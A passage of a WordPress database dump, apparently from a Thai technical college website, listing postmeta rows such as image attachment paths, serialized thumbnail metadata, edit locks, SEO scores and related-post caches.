";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8195, 3692, '_thumbnail_id', '3693'),
(8199, 3692, '_hide_featured', NULL),
(8200, 3692, '_wpas_done_all', '1'),
(8201, 3696, '_edit_lock', '1534232376:3'),
(8202, 3696, '_edit_last', '3'),
(8203, 3697, '_wp_attached_file', '2018/08/38872918_652443801798478_1168059099661729792_o.jpg'),
(8204, 3697, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/08/38872918_652443801798478_1168059099661729792_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"38872918_652443801798478_1168059099661729792_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"38872918_652443801798478_1168059099661729792_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"38872918_652443801798478_1168059099661729792_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"38872918_652443801798478_1168059099661729792_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"38872918_652443801798478_1168059099661729792_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8205, 3696, '_thumbnail_id', '3697'),
(8209, 3696, '_hide_featured', NULL),
(8210, 3696, '_wpas_done_all', '1'),
(8211, 3699, '_edit_lock', '1534232482:3'),
(8212, 3699, '_edit_last', '3'),
(8213, 3701, '_wp_attached_file', '2018/08/38875597_652485838460941_5723877600841957376_o.jpg'),
(8214, 3701, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:4:\"file\";s:58:\"2018/08/38875597_652485838460941_5723877600841957376_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"38875597_652485838460941_5723877600841957376_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"38875597_652485838460941_5723877600841957376_o-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"38875597_652485838460941_5723877600841957376_o-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"38875597_652485838460941_5723877600841957376_o-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"38875597_652485838460941_5723877600841957376_o-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8215, 3699, '_thumbnail_id', '3701'),
(8219, 3699, '_hide_featured', NULL),
(8220, 3699, '_wpas_done_all', '1'),
(8221, 3705, '_wp_attached_file', '2018/08/14-8-2561-8-40-13.jpg'),
(8222, 3705, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:665;s:6:\"height\";i:380;s:4:\"file\";s:29:\"2018/08/14-8-2561-8-40-13.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-8-2561-8-40-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"14-8-2561-8-40-13-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"14-8-2561-8-40-13-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8230, 3696, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575048675;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3988;}i:1;a:1:{s:2:\"id\";i:4964;}i:2;a:1:{s:2:\"id\";i:4718;}}}}'),
(8232, 3711, '_wp_attached_file', '2018/08/หนังสือแนะนำการเบิกประกันฯ-1.pdf'),
(8233, 3712, '_wp_attached_file', '2018/08/หนังสือเรียกร้องค่าสินไหมทดแทน.pdf'),
(8234, 3713, '_wp_attached_file', '2018/08/หนังสือสละสิทธิ.pdf'),
(8244, 3749, '_wp_attached_file', '2018/08/S__5062722.jpg'),
(8245, 3749, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1900;s:6:\"height\";i:725;s:4:\"file\";s:22:\"2018/08/S__5062722.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"S__5062722-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"S__5062722-300x114.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:114;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"S__5062722-768x293.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"S__5062722-1024x391.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:391;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"S__5062722-400x153.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8256, 3692, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575549801;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6057;}i:1;a:1:{s:2:\"id\";i:6060;}i:2;a:1:{s:2:\"id\";i:3965;}}}}'),
(8272, 3769, '_thumbnail_id', '3693'),
(8273, 3769, '_edit_lock', '1534226688:3'),
(8274, 3769, '_edit_last', '3'),
(8275, 3770, '_thumbnail_id', '3693'),
(8276, 3770, '_edit_lock', '1534230895:3'),
(8277, 3770, '_edit_last', '3'),
(8279, 3770, '_hide_featured', NULL),
(8280, 3770, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575363399;s:7:\"payload\";a:0:{}}}'),
(8281, 3699, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575676338;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4304;}i:1;a:1:{s:2:\"id\";i:5159;}i:2;a:1:{s:2:\"id\";i:4698;}}}}'),
(8282, 3773, '_thumbnail_id', '3693'),
(8283, 3773, '_edit_lock', '1534230626:3'),
(8284, 3773, '_edit_last', '3'),
(8291, 3770, '_wpas_done_all', '1'),
(8292, 3780, '_thumbnail_id', '3697'),
(8293, 3780, '_edit_lock', '1534232455:3'),
(8294, 3780, '_edit_last', '3'),
(8298, 3780, '_hide_featured', NULL),
(8299, 3780, '_wpas_done_all', '1'),
(8300, 3784, '_thumbnail_id', '3701'),
(8301, 3784, '_edit_lock', '1534232920:3'),
(8302, 3784, '_edit_last', '3'),
(8306, 3784, '_hide_featured', NULL),
(8307, 3784, '_wpas_done_all', '1'),
(8308, 3784, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575666814;s:7:\"payload\";a:0:{}}}'),
(8309, 3780, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575527054;s:7:\"payload\";a:0:{}}}'),
(8312, 3788, '_edit_lock', '1534323786:3'),
(8313, 3788, '_edit_last', '3'),
(8314, 3789, '_wp_attached_file', '2018/08/15-8-2561-16-05-12.jpg'),
(8315, 3789, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:450;s:6:\"height\";i:635;s:4:\"file\";s:30:\"2018/08/15-8-2561-16-05-12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"15-8-2561-16-05-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"15-8-2561-16-05-12-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"15-8-2561-16-05-12-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8319, 3788, '_hide_featured', NULL),
(8320, 3788, '_wpas_done_all', '1'),
(8321, 3792, '_wp_attached_file', '2018/08/39179904_657459031296955_65617651354828800_o.jpg'),
(8322, 3792, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:56:\"2018/08/39179904_657459031296955_65617651354828800_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"39179904_657459031296955_65617651354828800_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"39179904_657459031296955_65617651354828800_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:56:\"39179904_657459031296955_65617651354828800_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:57:\"39179904_657459031296955_65617651354828800_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:56:\"39179904_657459031296955_65617651354828800_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8323, 3788, '_thumbnail_id', '3792'),
(8326, 3793, '_thumbnail_id', '3792'),
(8327, 3793, '_edit_lock', '1534324411:3'),
(8328, 3793, '_edit_last', '3'),
(8329, 3794, '_wp_attached_file', '2018/08/39179904_657459031296955_65617651354828800_o-1.jpg'),
(8330, 3794, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/39179904_657459031296955_65617651354828800_o-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"39179904_657459031296955_65617651354828800_o-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"39179904_657459031296955_65617651354828800_o-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"39179904_657459031296955_65617651354828800_o-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"39179904_657459031296955_65617651354828800_o-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"39179904_657459031296955_65617651354828800_o-1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8331, 3795, '_wp_attached_file', '2018/08/15-8-2561-16-05-12-1.jpg'),
(8332, 3795, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:450;s:6:\"height\";i:635;s:4:\"file\";s:32:\"2018/08/15-8-2561-16-05-12-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"15-8-2561-16-05-12-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"15-8-2561-16-05-12-1-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"15-8-2561-16-05-12-1-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8336, 3793, '_hide_featured', NULL),
(8337, 3793, '_wpas_done_all', '1'),
(8338, 3648, '_thumbnail_id', '3660'),
(8341, 3788, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575388741;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5091;}i:1;a:1:{s:2:\"id\";i:5029;}i:2;a:1:{s:2:\"id\";i:4029;}}}}'),
(8342, 3793, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575066309;s:7:\"payload\";a:0:{}}}'),
(8346, 3805, '_edit_lock', '1542339372:3'),
(8347, 3805, '_edit_last', '3'),
(8348, 3805, '_hide_featured', NULL),
(8349, 3808, '_edit_lock', '1534476476:3'),
(8350, 3808, '_edit_last', '3'),
(8351, 3809, '_wp_attached_file', '2018/08/39278259_658701187839406_8574030190663958528_o.jpg'),
(8352, 3809, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/39278259_658701187839406_8574030190663958528_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"39278259_658701187839406_8574030190663958528_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"39278259_658701187839406_8574030190663958528_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"39278259_658701187839406_8574030190663958528_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"39278259_658701187839406_8574030190663958528_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"39278259_658701187839406_8574030190663958528_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8353, 3808, '_thumbnail_id', '3809'),
(8357, 3808, '_hide_featured', NULL),
(8358, 3808, '_wpas_done_all', '1'),
(8361, 3813, '_thumbnail_id', '3809'),
(8362, 3813, '_edit_lock', '1534479562:3'),
(8363, 3813, '_edit_last', '3'),
(8367, 3813, '_hide_featured', NULL),
(8368, 3813, '_wpas_done_all', '1'),
(8371, 3813, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575392040;s:7:\"payload\";a:0:{}}}'),
(8372, 3808, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575645334;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4026;}i:1;a:1:{s:2:\"id\";i:5197;}i:2;a:1:{s:2:\"id\";i:3988;}}}}'),
(8373, 3817, '_wp_attached_file', '2018/08/3.แนวปฏิบัติของ-อวท.-.doc'),
(8376, 160, '_yoast_wpseo_content_score', '60'),
(8377, 160, '_cg_img_link', 'http://www.technicrayong.ac.th'),
(8378, 160, '_cg_link_target', ''),
(8379, 3826, '_edit_lock', '1535083636:3'),
(8380, 3826, '_edit_last', '3'),
(8381, 3827, '_wp_attached_file', '2018/08/39467395_659567821086076_2746832332563415040_o.jpg'),
(8382, 3827, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/39467395_659567821086076_2746832332563415040_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"39467395_659567821086076_2746832332563415040_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"39467395_659567821086076_2746832332563415040_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"39467395_659567821086076_2746832332563415040_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"39467395_659567821086076_2746832332563415040_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"39467395_659567821086076_2746832332563415040_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8383, 3826, '_thumbnail_id', '3827'),
(8387, 3826, '_hide_featured', NULL),
(8388, 3826, '_yoast_wpseo_content_score', '30'),
(8389, 3826, '_yoast_wpseo_primary_category', ''),
(8390, 3826, '_wpas_done_all', '1'),
(8391, 3829, '_edit_lock', '1535441267:3'),
(8392, 3829, '_edit_last', '3'),
(8393, 3830, '_wp_attached_file', '2018/08/21-8-2561-8-43-46.jpg'),
(8394, 3830, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:463;s:6:\"height\";i:632;s:4:\"file\";s:29:\"2018/08/21-8-2561-8-43-46.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"21-8-2561-8-43-46-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"21-8-2561-8-43-46-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"21-8-2561-8-43-46-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8395, 3826, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575696521;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6119;}i:1;a:1:{s:2:\"id\";i:6308;}i:2;a:1:{s:2:\"id\";i:5291;}}}}'),
(8396, 3831, '_wp_attached_file', '2018/08/39442273_660601984315993_1317723643182055424_o.jpg'),
(8397, 3831, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/39442273_660601984315993_1317723643182055424_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"39442273_660601984315993_1317723643182055424_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"39442273_660601984315993_1317723643182055424_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"39442273_660601984315993_1317723643182055424_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"39442273_660601984315993_1317723643182055424_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"39442273_660601984315993_1317723643182055424_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8398, 3829, '_thumbnail_id', '3831'),
(8402, 3829, '_hide_featured', NULL),
(8403, 3829, '_yoast_wpseo_content_score', '30'),
(8404, 3829, '_yoast_wpseo_primary_category', ''),
(8405, 3829, '_wpas_done_all', '1'),
(8406, 3829, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575743816;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4157;}i:1;a:1:{s:2:\"id\";i:3961;}i:2;a:1:{s:2:\"id\";i:3988;}}}}'),
(8407, 2642, '_yoast_wpseo_content_score', '30'),
(8408, 3837, '_thumbnail_id', '3827'),
(8409, 3837, '_yoast_wpseo_primary_category', '4'),
(8410, 3837, '_edit_lock', '1535090261:3'),
(8411, 3837, '_edit_last', '3'),
(8415, 3837, '_hide_featured', NULL),
(8416, 3837, '_yoast_wpseo_content_score', '30'),
(8417, 3837, '_wpas_done_all', '1'),
(8422, 3841, '_edit_lock', '1535530225:3'),
(8423, 3841, '_edit_last', '3'),
(8426, 3843, '_wp_attached_file', '2018/08/39894734_1935072023179659_5433646843672133632_o.jpg'),
